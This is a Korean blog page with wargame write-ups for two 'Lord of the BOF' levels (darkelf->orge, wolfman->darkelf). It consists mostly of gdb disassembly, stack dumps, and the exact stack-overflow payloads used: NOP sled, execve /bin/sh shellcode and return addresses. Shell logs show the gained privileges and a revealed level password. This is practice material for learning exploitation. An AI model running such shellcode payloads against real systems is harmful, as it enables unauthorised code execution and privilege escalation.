'분류 전체보기' 카테고리의 글 목록 (6 Page)

'분류 전체보기'에 해당되는 글 55건

2014.02.20 darkelf->orge
2014.02.20 wolfman -> darkelf
2014.02.20 orc -> wolfman
2014.02.20 gremlin -> cobolt
2014.02.20 gate -> gremlin

darkelf->orge

Wargame/LOB (Redhat9) 2014. 2. 20. 15:12

0x8048529 <main+41>:    call   0x80483f0 <strlen>
0x804852e <main+46>:    add    $0x4,%esp
0x8048531 <main+49>:    mov    %eax,%eax
0x8048533 <main+51>:    cmp    $0x4d,%eax
0x8048536 <main+54>:    je     0x8048550 <main+80>
0x8048538 <main+56>:    push   $0x804869c
0x804853d <main+61>:    call   0x8048410 <printf>
0x8048542 <main+66>:    add    $0x4,%esp
0x8048545 <main+69>:    push   $0x0
0x8048547 <main+71>:    call   0x8048420 <exit>
0x804854c <main+76>:    add    $0x4,%esp
0x804854f <main+79>:    nop
0x8048550 <main+80>:    nop
0x8048551 <main+81>:    movl   $0x0,0xffffffd4(%ebp)
0x8048558 <main+88>:    mov    0xffffffd4(%ebp),%eax
0x804855b <main+91>:    lea    0x0(,%eax,4),%edx
0x8048562 <main+98>:    mov    0x80497d4,%eax
0x8048567 <main+103>:   cmpl   $0x0,(%eax,%edx,1)
0x804856b <main+107>:   jne    0x8048570 <main+112>
0x804856d <main+109>:   jmp    0x80485b0 <main+176>
0x804856f <main+111>:   nop
0x8048570 <main+112>:   mov    0xffffffd4(%ebp),%eax
0x8048573 <main+115>:   lea    0x0(,%eax,4),%edx
0x804857a <main+122>:   mov    0x80497d4,%eax
0x804857f <main+127>:   mov    (%eax,%edx,1),%edx
0x8048582 <main+130>:   push   %edx
0x8048583 <main+131>:   call   0x80483f0 <strlen>
0x8048588 <main+136>:   add    $0x4,%esp
0x804858b <main+139>:   mov    %eax,%eax
0x804858d <main+141>:   push   %eax
0x804858e <main+142>:   push   $0x0
0x8048590 <main+144>:   mov    0xffffffd4(%ebp),%eax
0x8048593 <main+147>:   lea    0x0(,%eax,4),%edx
0x804859a <main+154>:   mov    0x80497d4,%eax
0x804859f <main+159>:   mov    (%eax,%edx,1),%edx
0x80485a2 <main+162>:   push   %edx
---Type <return> to continue, or q <return> to quit---
0x80485a3 <main+163>:   call   0x8048430 <memset>
0x80485a8 <main+168>:   add    $0xc,%esp
0x80485ab <main+171>:   incl   0xffffffd4(%ebp)
0x80485ae <main+174>:   jmp    0x8048558 <main+88>
0x80485b0 <main+176>:   mov    0xc(%ebp),%eax
0x80485b3 <main+179>:   add    $0x4,%eax
0x80485b6 <main+182>:   mov    (%eax),%edx
0x80485b8 <main+184>:   add    $0x2f,%edx
0x80485bb <main+187>:   cmpb   $0xbf,(%edx)
0x80485be <main+190>:   je     0x80485d7 <main+215>
0x80485c0 <main+192>:   push   $0x80486ab
0x80485c5 <main+197>:   call   0x8048410 <printf>
0x80485ca <main+202>:   add    $0x4,%esp
0x80485cd <main+205>:   push   $0x0
0x80485cf <main+207>:   call   0x8048420 <exit>
0x80485d4 <main+212>:   add    $0x4,%esp
0x80485d7 <main+215>:   mov    0xc(%ebp),%eax
0x80485da <main+218>:   add    $0x4,%eax
0x80485dd <main+221>:   mov    (%eax),%edx
0x80485df <main+223>:   push   %edx
0x80485e0 <main+224>:   call   0x80483f0 <strlen>
0x80485e5 <main+229>:   add    $0x4,%esp
0x80485e8 <main+232>:   mov    %eax,%eax
0x80485ea <main+234>:   cmp    $0x30,%eax
0x80485ed <main+237>:   jbe    0x8048606 <main+262>
0x80485ef <main+239>:   push   $0x80486c8
0x80485f4 <main+244>:   call   0x8048410 <printf>
0x80485f9 <main+249>:   add    $0x4,%esp
0x80485fc <main+252>:   push   $0x0
0x80485fe <main+254>:   call   0x8048420 <exit>
0x8048603 <main+259>:   add    $0x4,%esp
0x8048606 <main+262>:   mov    0xc(%ebp),%eax
0x8048609 <main+265>:   add    $0x4,%eax
0x804860c <main+268>:   mov    (%eax),%edx
0x804860e <main+270>:   push   %edx
0x804860f <main+271>:   lea    0xffffffd8(%ebp),%eax
0x8048612 <main+274>:   push   %eax
0x8048613 <main+275>:   call   0x8048440 <strcpy>
0x8048618 <main+280>:   add    $0x8,%esp
0x804861b <main+283>:   lea    0xffffffd8(%ebp),%eax
0x804861e <main+286>:   push   %eax
0x804861f <main+287>:   push   $0x80486df
0x8048624 <main+292>:   call   0x8048410 <printf>
0x8048629 <main+297>:   add    $0x8,%esp
0x804862c <main+300>:   push   $0x28
0x804862e <main+302>:   push   $0x0
0x8048630 <main+304>:   lea    0xffffffd8(%ebp),%eax
0x8048633 <main+307>:   push   %eax
0x8048634 <main+308>:   call   0x8048430 <memset>
0x8048639 <main+313>:   add    $0xc,%esp
0x804863c <main+316>:   leave
---Type <return> to continue, or q <return> to quit---
0x804863d <main+317>:   ret
0x804863e <main+318>:   nop
0x804863f <main+319>:   nop
End of assembler dump.
(gdb) b *main+317
Breakpoint 1 at 0x804863d
(gdb) r aaaa
Starting program: /home/darkelf/tmp///////////////////////////////////////////////////////orge aaaa
argv[0] error

Program exited normally.
(gdb) Quit
(gdb) q
[darkelf@localhost tmp]$ ls
orge test test.c
[darkelf@localhost tmp]$ vi test.c
[darkelf@localhost tmp]$ gcc -o test test.c
[darkelf@localhost tmp]$ ./test
76[darkelf@localhost tmp]$ gdb -q /home/darkelf/tmp////////////////////////////////////////////////////////orge
(gdb) b *main+317
Breakpoint 1 at 0x804863d
(gdb) r aaa
Starting program: /home/darkelf/tmp////////////////////////////////////////////////////////orge aaa
stack is still your friend.

Program exited normally.
(gdb) `python -c 'print "\xbf"*44+"\x6c\xfd\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
Undefined command: "". Try "help".
(gdb) r `python -c 'print "\xbf"*44+"\x6c\xfd\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
Starting program: /home/darkelf/tmp////////////////////////////////////////////////////////orge `python -c 'print "\xbf"*44+"\x6c\xfd\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿lý¿¿

Breakpoint 1, 0x804863d in main ()
(gdb) x/100x $esp
0xbffff96c:     0xbfbffd6c      0x00000000      0xbffff9b4      0xbffff9c4
0xbffff97c:     0x40013868      0x00000003      0x08048450      0x00000000
0xbffff98c:     0x08048471      0x08048500      0x00000003      0xbffff9b4
0xbffff99c:     0x08048390      0x0804866c      0x4000ae60      0xbffff9ac
0xbffff9ac:     0x40013e90      0x00000003      0xbffffaaa      0xbffffaf8
0xbffff9bc:     0xbffffb29      0x00000000      0xbffffc6e      0xbffffc90
0xbffff9cc:     0xbffffc9a      0xbffffca8      0xbffffcc7      0xbffffcd7
0xbffff9dc:     0xbffffcee      0xbffffd0b      0xbffffd16      0xbffffd24
0xbffff9ec:     0xbffffd67      0xbffffd7a      0xbffffd8f      0xbffffd9f
0xbffff9fc:     0xbffffdac      0xbffffdcb      0xbffffdd6      0xbffffde3
0xbffffa0c:     0xbffffdeb      0x00000000      0x00000003      0x08048034
0xbffffa1c:     0x00000004      0x00000020      0x00000005      0x00000006
0xbffffa2c:     0x00000006      0x00001000      0x00000007      0x40000000
0xbffffa3c:     0x00000008      0x00000000      0x00000009      0x08048450
0xbffffa4c:     0x0000000b      0x000001fa      0x0000000c      0x000001fa
0xbffffa5c:     0x0000000d      0x000001fa      0x0000000e      0x000001fa
0xbffffa6c:     0x00000010      0x0febfbff      0x0000000f      0xbffffaa5
0xbffffa7c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffa8c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffa9c:     0x00000000      0x00000000      0x38366900      0x682f0036
0xbffffaac:     0x2f656d6f      0x6b726164      0x2f666c65      0x2f706d74
0xbffffabc:     0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f
0xbffffacc:     0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f
0xbffffadc:     0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f      0x2f2f2f2f
0xbffffaec:     0x2f2f2f2f      0x6f2f2f2f      0x00656772      0xbfbfbfbf
(gdb)
0xbffffafc:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffb0c:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffb1c:     0xbfbfbfbf      0xbfbfbfbf      0xbfbffd6c      0x90909000
0xbffffb2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb4c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb5c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb6c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb7c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb8c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb9c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbac:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbbc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbcc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbdc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbec:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbfc:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc0c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc1c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc4c:     0x90909090      0x90909090      0x50c03190      0x732f2f68
0xbffffc5c:     0x622f6868      0xe3896e69      0xe1895350      0xcd0bb099
0xbffffc6c:     0x00000080      0x00000000      0x00000000      0x00000000
0xbffffc7c:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) Quit
(gdb) q
The program is running. Exit anyway? (y or n) y
[darkelf@localhost tmp]$ ./home/darkelf/tmp/////////////////////////////////////
bash: ./home/darkelf/tmp///////////////////////////////////////////////////////o
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////
stack is still your friend.
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////
argv error
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////
argv error
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////                                                                                                                     //////////////////orge `python -c 'print "\xbf"*44+"\x8c\xfb\xff\xbf"'` `python                                                                                                                      -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\x                                                                                                                     e3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Œû
Illegal instruction (core dumped)
[darkelf@localhost tmp]$ bash2
[darkelf@localhost tmp]$ `python -c 'print "\xbf"*44+"\x6c\xfd\xbf\xbf"'` `pytho                                                                                                                     n -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89                                                                                                                     \xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
bash2: ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿lý¿¿: command not found
[darkelf@localhost tmp]$
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////                                                                                                                     //////////////////orge `python -c 'print "\xbf"*44+"\x8c\xfb\xff\xbf"'` `python                                                                                                                      -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\x                                                                                                                     e3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Œûÿ¿
bash$ id
uid=506(darkelf) gid=506(darkelf) groups=506(darkelf)
bash$ exit
exit
[darkelf@localhost tmp]$ cd ../
[darkelf@localhost darkelf]$ .//////////////////////////////////////////////////                                                                                                                     //////////////////////orge `python -c 'print "\xbf"*44+"\x8c\xfb\xff\xbf"'` `pyt                                                                                                                     hon -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x                                                                                                                     89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Œûÿ¿
bash$
bash$ id
uid=506(darkelf) gid=506(darkelf) euid=507(orge) egid=507(orge) groups=506(darke                                                                                                                     lf)
bash$ whoami
orge
bash$ my-pass
euid = 507
timewalker
bash$
bash$

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

troll -> vampire (0)	2014.02.20
orge -> troll (0)	2014.02.20
wolfman -> darkelf (0)	2014.02.20
orc -> wolfman (0)	2014.02.20
gremlin -> cobolt (0)	2014.02.20

Posted by windowhan

wolfman -> darkelf

Wargame/LOB (Redhat9) 2014. 2. 20. 15:11

A ㅏ... 월요일 새벽 상쾌함의 극치를 달렸다.

마땅히 손에 잡히는것도 없고해서 BOF원정대를 풀려고햇는데 Aㅏ...

쉘코드넣었는데 한방에 풀렸다 아하하하핳 자반볶음에 밥비벼먹어야지

이번에는 argv[1]의 길이를 제한했었는데 argv[2]에 쉘코드넣고 리턴어드레스만 그쪽으로 돌려놨다

페이로드는 다음과 같다

`python -c 'print "\xbf"*44+"\x6c\xfd\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

좀 잘린 로그...랄까?

Starting program: /home/wolfman/tmp/attackme `python -c 'print "\xbf"*44+"\xec\x

fc\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68

\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜賃옜

Breakpoint 1, 0x8048617 in main ()

(gdb) x/100x $esp-100

0xbffffb28: 0xfffffe7d 0x4005d920 0x400143e0 0xbffffb4c

0xbffffb38: 0x40066070 0x40106980 0x4000ae60 0xbffffbd4

0xbffffb48: 0xbffffb88 0x08048613 0xbffffb60 0x00000000

0xbffffb58: 0x00000028 0x00000013 0x00000000 0x00000000

0xbffffb68: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb78: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb88: 0xbfbfbfbf 0xbfbffcec 0x00000000 0xbffffbd4

0xbffffb98: 0xbffffbe4 0x40013868 0x00000003 0x08048450

0xbffffba8: 0x00000000 0x08048471 0x08048500 0x00000003

0xbffffbb8: 0xbffffbd4 0x08048390 0x0804864c 0x4000ae60

0xbffffbc8: 0xbffffbcc 0x40013e90 0x00000003 0xbffffcc7

0xbffffbd8: 0xbffffce2 0xbffffd13 0x00000000 0xbffffe58

0xbffffbe8: 0xbffffe7a 0xbffffe84 0xbffffe92 0xbffffeb1

0xbffffbf8: 0xbffffec1 0xbffffeda 0xbffffef7 0xbfffff01

0xbffffc08: 0xbfffff0f 0xbfffff52 0xbfffff65 0xbfffff7a

0xbffffc18: 0xbfffff8a 0xbfffff97 0xbfffffb6 0xbfffffc1

0xbffffc28: 0xbfffffce 0xbfffffd6 0x00000000 0x00000003

0xbffffc38: 0x08048034 0x00000004 0x00000020 0x00000005

0xbffffc48: 0x00000006 0x00000006 0x00001000 0x00000007

0xbffffc58: 0x40000000 0x00000008 0x00000000 0x00000009

0xbffffc68: 0x08048450 0x0000000b 0x000001f9 0x0000000c

0xbffffc78: 0x000001f9 0x0000000d 0x000001f9 0x0000000e

0xbffffc88: 0x000001f9 0x00000010 0x0febfbff 0x0000000f

0xbffffc98: 0xbffffcc2 0x00000000 0x00000000 0x00000000

---Type <return> to continue, or q <return> to quit---

0xbffffca8: 0x00000000 0x00000000 0x00000000 0x00000000

(gdb)

(gdb) x/100x $esp-500

0xbffff998: 0x40000000 0x00000000 0x400139d0 0x00000000

0xbffff9a8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff9b8: 0x40013a08 0x40013a00 0x400139d8 0x400139e0

0xbffff9c8: 0x400139e8 0x00000000 0x00000000 0x00000000

0xbffff9d8: 0x400139f0 0x400139f8 0x00000000 0x00000000

0xbffff9e8: 0x400139d0 0x40029b0e 0xbffffac0 0x400081e6

0xbffff9f8: 0x40029ad5 0x40029ad5 0x40013868 0x400143e0

0xbffffa08: 0x00004388 0x40013868 0x40029b0e 0xbffffae4

0xbffffa18: 0x400081e6 0x40029ad5 0x40029ad5 0x40013868

0xbffffa28: 0x400143e0 0x0000785c 0x400081e6 0x40029ad5

0xbffffa38: 0x080482f9 0x40013868 0x40013ed0 0x00000021

0xbffffa48: 0x00000075 0x4001ad70 0x00007080 0x40029b0e

0xbffffa58: 0xbffffb28 0x00000000 0x40029ad5 0x40021df0

0xbffffa68: 0x00000708 0x40021fd0 0x4001ad70 0x400143e0

0xbffffa78: 0x00000003 0x40014650 0x00000001 0xbffffa9c

0xbffffa88: 0x40021df0 0x400145e4 0x0d790266 0xbffffb18

0xbffffa98: 0x4002982c 0x40021df0 0x400143e0 0x400140d4

0xbffffaa8: 0x077905a6 0xbffffb30 0x08048275 0x4001b630

0xbffffab8: 0x400143e0 0x400143e0 0x40014650 0x00000001

0xbffffac8: 0xbffffae0 0x08048184 0x400140d4 0x078e530f

0xbffffad8: 0xbffffb5c 0x080482d0 0x40021ca0 0xbffffb1c

0xbffffae8: 0x4000a7fd 0x400143d0 0x400146b0 0x00000007

0xbffffaf8: 0x4000a74e 0x401081ec 0x4000ae60 0xbffffbd4

0xbffffb08: 0x400143e0 0x40021df0 0x401088c0 0x4002982c

---Type <return> to continue, or q <return> to quit---

0xbffffb18: 0x40021df0 0xbffffb4c 0x4000a970 0xbffffd13

(gdb) x/100x $ebp-300

0xbfbfbe93: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbea3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbeb3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbec3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbed3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbee3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbef3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf03: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf13: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf23: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf33: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf43: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf53: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf63: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf73: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf83: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf93: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbfa3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbfb3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbfc3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbfd3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbfe3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbff3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfc003: 0x00000000 0x00000000 0x00000000 0x00000000

---Type <return> to continue, or q <return> to quit---

0xbfbfc013: 0x00000000 0x00000000 0x00000000 0x00000000

(gdb) x/100x $ebp-300

0xbfbfbe93: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbea3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbeb3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbec3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbed3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbee3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbef3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf03: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf13: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf23: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf33: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf43: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf53: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf63: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf73: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf83: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbf93: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbfa3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbfb3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbfc3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbfd3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbfe3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfbff3: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfbfc003: 0x00000000 0x00000000 0x00000000 0x00000000

---Type <return> to continue, or q <return> to quit---

0xbfbfc013: 0x00000000 0x00000000 0x00000000 0x00000000

(gdb) x/300wx $esp

0xbffffb8c: 0xbfbffcec 0x00000000 0xbffffbd4 0xbffffbe4

0xbffffb9c: 0x40013868 0x00000003 0x08048450 0x00000000

0xbffffbac: 0x08048471 0x08048500 0x00000003 0xbffffbd4

0xbffffbbc: 0x08048390 0x0804864c 0x4000ae60 0xbffffbcc

0xbffffbcc: 0x40013e90 0x00000003 0xbffffcc7 0xbffffce2

0xbffffbdc: 0xbffffd13 0x00000000 0xbffffe58 0xbffffe7a

0xbffffbec: 0xbffffe84 0xbffffe92 0xbffffeb1 0xbffffec1

0xbffffbfc: 0xbffffeda 0xbffffef7 0xbfffff01 0xbfffff0f

0xbffffc0c: 0xbfffff52 0xbfffff65 0xbfffff7a 0xbfffff8a

0xbffffc1c: 0xbfffff97 0xbfffffb6 0xbfffffc1 0xbfffffce

0xbffffc2c: 0xbfffffd6 0x00000000 0x00000003 0x08048034

0xbffffc3c: 0x00000004 0x00000020 0x00000005 0x00000006

0xbffffc4c: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffc5c: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffc6c: 0x0000000b 0x000001f9 0x0000000c 0x000001f9

0xbffffc7c: 0x0000000d 0x000001f9 0x0000000e 0x000001f9

0xbffffc8c: 0x00000010 0x0febfbff 0x0000000f 0xbffffcc2

0xbffffc9c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcac: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcbc: 0x00000000 0x36690000 0x2f003638 0x656d6f68

0xbffffccc: 0x6c6f772f 0x6e616d66 0x706d742f 0x7474612f

0xbffffcdc: 0x6d6b6361 0xbfbf0065 0xbfbfbfbf 0xbfbfbfbf

0xbffffcec: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf

0xbffffcfc: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf

---Type <return> to continue, or q <return> to quit---

0xbffffd0c: 0xfcecbfbf 0x9000bfbf 0x90909090 0x90909090

0xbffffd1c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd2c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd3c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd4c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd5c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd6c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd7c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd8c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffd9c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdac: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdbc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdcc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffddc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdec: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffdfc: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe0c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe1c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe2c: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffe3c: 0x31909090 0x2f6850c0 0x6868732f 0x6e69622f

0xbffffe4c: 0x5350e389 0xb099e189 0x0080cd0b 0x00000000

0xbffffe5c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe6c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe7c: 0x00000000 0x00000000 0x00000000 0x00000000

---Type <return> to continue, or q <return> to quit---q

Quit

(gdb) q

The program is running. Exit anyway? (y or n) y

[wolfman@localhost tmp]$ ./darkelf `python -c 'print "\xbf"*44+"\x6c\xfd\xff\xb

f"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62

\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

bash: ./darkelf: No such file or directory

[wolfman@localhost tmp]$ ./attackme `python -c 'print "\xbf"*44+"\x6c\xfd\xff\x

bf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x6

2\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜l

?egmentation fault (core dumped)

[wolfman@localhost tmp]$ gdb -q core

"/home/wolfman/tmp/core": not in executable format: File format not recognized

(gdb) disas main

No symbol table is loaded. Use the "file" command.

(gdb) q

[wolfman@localhost tmp]$ gdb -q attackme

(gdb) b *main+279

Breakpoint 1 at 0x8048617

(gdb) r `python -c 'print "\xbf"*44+"\x6c\xfd\xff\xbf"'` `python -c 'print "\x9

0"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x8

9\xe1\x99\xb0\x0b\xcd\x80"'`

Starting program: /home/wolfman/tmp/attackme `python -c 'print "\xbf"*44+"\x6c\x

fd\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68

\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜l

?reakpoint 1, 0x8048617 in main ()

(gdb) x/330wx $esp

0xbffffb8c: 0x4000fd6c 0x00000004 0xbffffbd4 0xbffffbe8

0xbffffb9c: 0x40013868 0x00000004 0x08048450 0x00000000

0xbffffbac: 0x08048471 0x08048500 0x00000004 0xbffffbd4

0xbffffbbc: 0x08048390 0x0804864c 0x4000ae60 0xbffffbcc

0xbffffbcc: 0x40013e90 0x00000004 0xbffffcc7 0xbffffce2

0xbffffbdc: 0xbffffd11 0xbffffd13 0x00000000 0xbffffe58

0xbffffbec: 0xbffffe7a 0xbffffe84 0xbffffe92 0xbffffeb1

0xbffffbfc: 0xbffffec1 0xbffffeda 0xbffffef7 0xbfffff01

0xbffffc0c: 0xbfffff0f 0xbfffff52 0xbfffff65 0xbfffff7a

0xbffffc1c: 0xbfffff8a 0xbfffff97 0xbfffffb6 0xbfffffc1

0xbffffc2c: 0xbfffffce 0xbfffffd6 0x00000000 0x00000003

0xbffffc3c: 0x08048034 0x00000004 0x00000020 0x00000005

0xbffffc4c: 0x00000006 0x00000006 0x00001000 0x00000007

0xbffffc5c: 0x40000000 0x00000008 0x00000000 0x00000009

0xbffffc6c: 0x08048450 0x0000000b 0x000001f9 0x0000000c

0xbffffc7c: 0x000001f9 0x0000000d 0x000001f9 0x0000000e

0xbffffc8c: 0x000001f9 0x00000010 0x0febfbff 0x0000000f

0xbffffc9c: 0xbffffcc2 0x00000000 0x00000000 0x00000000

0xbffffcac: 0x00000000 0x00000000 0x00000000 0x00000000

